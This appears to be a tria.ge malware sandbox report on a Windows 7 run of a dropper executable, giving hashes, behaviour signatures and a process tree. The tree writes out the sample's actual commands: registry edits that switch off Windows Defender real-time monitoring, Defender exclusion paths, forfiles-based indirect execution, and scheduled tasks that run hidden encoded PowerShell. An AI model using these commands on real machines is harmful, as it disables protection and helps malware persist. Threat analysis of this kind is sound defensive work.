Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    245s
  • max time network
    246s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26/08/2024, 05:01 UTC

General

  • Target

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe

  • Size

    7.3MB

  • MD5

    d899e1c3b4b597f35991ad001796efb6

  • SHA1

    74b306cc449fab5ca903c480a953c4390660cca4

  • SHA256

    35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549

  • SHA512

    99220fbfc50497a6c194a0adff91ab88d8617d71572e787896d11ba374d936acdc4fa2ab519d494cc5c6a0f1bd2d19158f3bed4a782827e88f51c562a9c1daa0

  • SSDEEP

    196608:91OlKUM0XQhhsNRl31gOfczhFgsm7BrrcfWMhbr0Ow6mrjKLlT:3OlQ0U+pfcFCsm7BrrcfXG6JLl

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe
    "C:\Users\Admin\AppData\Local\Temp\35ef4c3815a9201d702e0f16ff7d5778ff092063b6e610d2ced58cb25eba2549.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Users\Admin\AppData\Local\Temp\7zSC67A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Users\Admin\AppData\Local\Temp\7zSC8CB.tmp\Install.exe
        .\Install.exe /ldidp "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2072
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2184
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2460
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2720
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2716
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2752
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                  PID:2816
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2820
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:2836
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:2848
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:3068
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                      PID:2740
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2304
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:2608
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Indirect Command Execution
                    PID:2700
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                        PID:3016
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3036
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3004
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bWNXgrRlacKgnUwPKK" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe\" Hi /gdpdidfiz 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Scheduled Task/Job: Scheduled Task
                      PID:2860
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 676
                      4⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:1720
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {3B30062D-F970-4E37-9734-8D823D3745AA} S-1-5-18:NT AUTHORITY\System:Service:
                1⤵
                  PID:2052
                  • C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe
                    C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi\iXTuROILDACSXYD\YBLNFyl.exe Hi /gdpdidfiz 525403 /S
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:2068
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1792
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:496
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          5⤵
                            PID:448
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:1136
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          4⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:2092
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            5⤵
                              PID:1648
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:320
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1696
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1944
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                6⤵
                                  PID:948
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                              4⤵
                              • Indirect Command Execution
                              • System Location Discovery: System Language Discovery
                              PID:1392
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                5⤵
                                  PID:944
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1088
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                4⤵
                                • Indirect Command Execution
                                PID:2572
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                    PID:1764
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1520
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2096
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "gCsdWAqEI" /SC once /ST 00:16:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:1784
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "gCsdWAqEI"
                                3⤵
                                  PID:2140
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "gCsdWAqEI"
                                  3⤵
                                    PID:2904
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2756
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      • System Location Discovery: System Language Discovery
                                      PID:2820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2760
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      4⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      PID:2852
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "gcpmSykxt" /SC once /ST 02:28:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2980
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "gcpmSykxt"
                                    3⤵
                                      PID:2204
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gcpmSykxt"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1352
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:768
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1536
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1356
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2728
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:2696
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          PID:2008
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1008
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1000
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:1692
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1656
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2504
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2168
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C copy nul "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1592
                                          • C:\Windows\SysWOW64\wscript.exe
                                            wscript "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            • Modifies data under HKEY_USERS
                                            PID:2560
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1092
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:320
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:612
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1088
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1460
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:484
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1596
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:908
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1788
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2256
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:1264
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1752
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:716
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:2404
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              PID:1296
                                            • C:\Windows\SysWOW64\reg.exe
